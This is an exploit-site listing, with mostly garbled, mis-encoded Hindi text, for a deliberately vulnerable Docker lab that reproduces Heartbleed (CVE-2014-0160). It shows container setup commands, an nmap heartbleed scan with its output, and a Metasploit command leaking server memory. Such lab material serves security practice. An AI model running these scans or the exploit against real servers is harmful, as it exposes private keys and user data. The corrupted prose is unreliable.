Sploitus

Exploit for vaas

kitploit ┬╖ 2026-08-25

Exploit Code

MARKDOWN66 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HMLIO-VAAS-CVE-2014-0160
# рд╕реЗрд╡рд╛ рдХреЗ рд░реВрдк рдореЗрдВ рднреЗрджреНрдпрддрд╛ - CVE 2014-0160

рдПрдХ рдбреЗрдмрд┐рдпрди (Wheezy) рд▓рд┐рдирдХреНрд╕ рд╕рд┐рд╕реНрдЯрдо рдЬрд┐рд╕рдореЗрдВ libssl рдФрд░ openssl рдХрд╛ рдПрдХ рднреЗрджреНрдп рд╕рдВрд╕реНрдХрд░рдг рдФрд░ рдПрдХ рд╡реЗрдм рд╕рд░реНрд╡рд░ рд╣реИ рдЬреЛ CVS-2014-0160, рдЬрд┐рд╕реЗ Heartbleed рдХреЗ рдирд╛рдо рд╕реЗ рднреА рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИ, рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИред

# рдЕрд╡рд▓реЛрдХрди

рдпрд╣ рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░ рдбреЗрдмрд┐рдпрди Jessie рдкрд░ рдЖрдзрд╛рд░рд┐рдд рд╣реИ рдФрд░ рдЗрд╕реЗ libssl рдФрд░ openssl рдХреЗ рдПрдХ рднреЗрджреНрдп рд╕рдВрд╕реНрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрд╢реЛрдзрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

Apache 2 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рд╕рд░рд▓ рд╕реНрдерд┐рд░ рд╡реЗрдм рдкреГрд╖реНрда рдкрд░реЛрд╕рд╛ рдЬрд╛рддрд╛ рд╣реИред

# рдЙрдкрдпреЛрдЧ

рдХрдВрдЯреЗрдирд░ рдХреЛ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВ: `docker pull hmlio/vaas-cve-2014-0160`

рдХрдВрдЯреЗрдирд░ рдХреЛ рдкреЛрд░реНрдЯ рдореИрдкрд┐рдВрдЧ рдХреЗ рд╕рд╛рде рдЪрд▓рд╛рдПрдБ: `docker run -d -p 8443:443 hmlio/vaas-cve-2014-0160`

рдЖрдкрдХреЛ рд╡реЗрдм рдПрдкреНрд▓рд┐рдХреЗрд╢рди http://your-ip:8443/ рдкрд░ рдПрдХреНрд╕реЗрд╕ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдПред

# рдЬрд╛рдБрдЪ

рд╡реЗрдм рд╕рд░реНрд╡рд░/рднреЗрджреНрдп openssl/libssl рд╕рдВрд╕реНрдХрд░рдг рдХреЛ рдиреАрдЪреЗ рджрд┐рдЦрд╛рдП рдЕрдиреБрд╕рд╛рд░ рд╕рддреНрдпрд╛рдкрд┐рдд рдФрд░ рд╢реЛрд╖рдг рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ (Kali рдорд╢реАрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрд╢рдВрд╕рд╛ рдХреА рдЬрд╛рддреА рд╣реИ):  


root@kitploit:~
    
    
    root@kali:~/vaas-cve-2014-0160# nmap -sV -p 8443 --script=ssl-heartbleed your-ip
    Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-26 17:31 EDT
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.000068s latency).
    Other addresses for localhost (not scanned): ::1
    
    PORT     STATE SERVICE VERSION
    8443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
    |_http-server-header: Apache/2.4.10 (Debian)
    | ssl-heartbleed: 
    |   VULNERABLE:
    |   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
    |     State: VULNERABLE
    |     Risk factor: High
    |       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
    |           
    |     References:
    |       https://vulners.com/cve/CVE-2014-0160
    |       http://cvedetails.com/cve/2014-0160/
    |_      http://www.openssl.org/news/secadv_20140407.txt 
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds
    

# рд╢реЛрд╖рдг

root@kitploit:~
    
    
    Using msfcli from the Metasploit framework:
    root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E
    
    ...
    ...
    [*] 192.168.179.230:8443 - Sending Heartbeat...
    [*] 192.168.179.230:8443 - Heartbeat response, 65535 bytes
    [+] 192.168.179.230:8443 - Heartbeat response with leak
    [*] 192.168.179.230:8443 - Printable info leaked: U`tcz~8}"V2|vf3<tf"!98532ED/A/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip